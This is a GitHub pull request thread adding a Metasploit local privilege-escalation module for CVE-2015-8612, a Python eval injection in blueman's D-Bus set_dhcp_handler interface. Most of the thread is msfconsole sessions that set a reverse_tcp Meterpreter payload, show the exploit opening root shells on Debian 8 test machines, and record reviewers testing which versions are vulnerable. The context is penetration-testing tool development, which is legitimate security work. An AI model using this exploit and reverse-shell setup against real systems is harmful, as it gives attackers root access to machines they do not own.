New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We鈥檒l occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add blueman set_dhcp_handler D-Bus Privilege Escalation #11169

Merged
merged 4 commits into from Jan 15, 2019

Conversation

Projects
None yet
2 participants
@bcoles
Copy link
Contributor

bcoles commented Dec 24, 2018

馃巿 馃巶 馃巵 馃巶 Happy third birthday CVE-2015-8612 馃巶 馃巵 馃巶 馃巿

Add blueman set_dhcp_handler D-Bus Privilege Escalation.

    This module attempts to gain root privileges by exploiting a Python
    code injection vulnerability in blueman versions prior to 2.0.3.

    The `org.blueman.Mechanism.EnableNetwork` D-Bus interface exposes the
    `set_dhcp_handler` function which uses user input in a call to `eval`,
    without sanitization, resulting in arbitrary code execution as root.

    This module has been tested successfully with blueman version 1.23
    on Debian 8 Jessie (x64).

Output

msf5 > use exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc 
msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Writing '/tmp/.DKJWL0TG7sm0M5' (249 bytes) ...
[*] Executing payload...
[*] Sending stage (861348 bytes) to 172.16.191.156
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.156:58863) at 2018-12-24 02:44:25 -0500
[+] Deleted /tmp/.DKJWL0TG7sm0M5

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : debian-8-1-x64.local
OS           : Debian 8.1 (Linux 3.16.0-4-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

Notes

  • Yes, specifying multiple Arch architectures like this is dumb. We should fix it. (outside of this PR). See: #10994 (comment)

  • No, it doesn't support ARCH_PYTHON. Not for any good reason.

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Jan 14, 2019

Debian 8.7.1
blueman 1.99~alpha1-1+deb8u1

msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] dbus-send is installed
[+] org.blueman.Mechanism.EnableNetwork D-Bus interface is available
[*] Writing '/tmp/.U6I1NzyNHHOh' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
[*] Executing payload...
Error org.freedesktop.DBus.Python.TypeError: Traceback (most recent call last):
  File "/usr/lib/python2.7/dist-packages/dbus/service.py", line 707, in _message_cb
    retval = candidate_method(self, *args, **keywords)
  File "<string>", line 2, in EnableNetwork
  File "/usr/lib/python2.7/dist-packages/blueman/plugins/mechanism/Network.py", line 73, in EnableNetwork
    nc.set_dhcp_handler(DHCPDHANDLERS[dhcp_handler])
TypeError: tuple indices must be integers, not dbus.String

[*] Exploit completed, but no session was created.

i believe check-valid-until didn't take, apt is saying its expired still on 8.7.1, so maybe the patches were backported to 1.99.

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Jan 14, 2019

i believe check-valid-until didn't take, apt is saying its expired still on 8.7.1, hence why 1.99 was installed instead of 1.23

apt-get -o Acquire::Check-Valid-Until=false update did seem to work, not sure why the option in sources.list didn't....

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Jan 14, 2019

Works, just still getting that error thrown.

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:8143 
[+] dbus-send is installed
[+] org.blueman.Mechanism.EnableNetwork D-Bus interface is available
[*] Writing '/tmp/.CAeRfUBOCSWwh' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (910632 bytes) to 2.2.2.2
Error org.freedesktop.DBus.Python.TypeError: Traceback (most recent call last):
  File "/usr/lib/python2.7/dist-packages/dbus/service.py", line 707, in _message_cb
    retval = candidate_method(self, *args, **keywords)
  File "<string>", line 2, in EnableNetwork
  File "/usr/lib/python2.7/dist-packages/blueman/plugins/mechanism/Network.py", line 70, in EnableNetwork
    eval("nc.set_dhcp_handler(%s)" % dhcp_handler)
  File "<string>", line 1, in <module>
  File "/usr/lib/python2.7/dist-packages/blueman/main/NetConf.py", line 235, in set_dhcp_handler
    if not isinstance(self.dhcp_handler, handler):
TypeError: isinstance() arg 2 must be a class, type, or tuple of classes and types

[*] Meterpreter session 2 opened (1.1.1.1:8143 -> 2.2.2.2:60635) at 2019-01-14 12:12:02 -0500
[+] Deleted /tmp/.CAeRfUBOCSWwh

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 2.2.2.2
OS           : Debian 8.7 (Linux 3.16.0-4-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > shell
Process 1529 created.
Channel 1 created.
apt-cache madison blueman
   blueman | 1.23-git201407171232-2 | http://snapshot.debian.org/archive/debian/20140827T042507Z/ jessie/main amd64 Packages
   blueman | 1.23-git201407171232-2 | http://snapshot.debian.org/archive/debian/20140827T042507Z/ jessie/main Sources

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Jan 14, 2019

Looks like according to the twitter post that python error is expected, and downstream of the exploit.
Part of me thinks something like vprint_status('The preceding line is expected, and is downstream of the exploit, therefore it is not indicitive of exploit success -> TypeError: isinstance() arg 2 must be a class, type, or tuple of classes and types') would clarify this, but the other part of me thinks most people won't care as long as a shell opens.
However, if the exploit isn't successful, they may attribute the lack of shell to the python error and a broken exploit, as opposed to the version not being vulnerable (especially if 1.99 has the patch backported).

@h00die h00die self-assigned this Jan 14, 2019

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Jan 14, 2019

Code all looks fine, pretty basic exploit, so just your call if you want to add a vprint or not. Let me know and ill get this taken care of!

bcoles added some commits Jan 14, 2019

@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Jan 15, 2019

The python error is expected. The user won't see it unless they set VERBOSE true.

If we go the vprint_status('The preceding line is expected, ... route, that implies they have a degree of confidence one way or another as to whether the target is vulnerable. In which case, we may as well add a conditional which prints a message to this effect, and let the user figure out the error message for themselves if they want to debug. In which case, we may as well check for it as well.

The bug was patched by replacing the call to eval. I've updated both check and exploit to check for eval("nc.set_dhcp_handler(%s)" % dhcp_handler) in the stack trace output.

Given that the exploit method calls check and compares CheckCode::Appears, if the target is not vulnerable, the exploit will never progress far enough for the user to see the python error message, nor the Failure::NotVulnerable message, unless they set ForceExploit true.

@h00die h00die merged commit 8c636f2 into rapid7:master Jan 15, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

h00die added a commit that referenced this pull request Jan 15, 2019

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Jan 15, 2019

that change did as expected, 1.99 failed and 1.23 worked!

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Jan 15, 2019

Release Notes

This PR adds the blueman set_dhcp_handler D-Bus Local Privilege Escalation exploit

@bcoles bcoles deleted the bcoles:blueman_set_dhcp_handler_dbus_priv_esc branch Jan 16, 2019

jmartin-r7 added a commit that referenced this pull request Jan 17, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment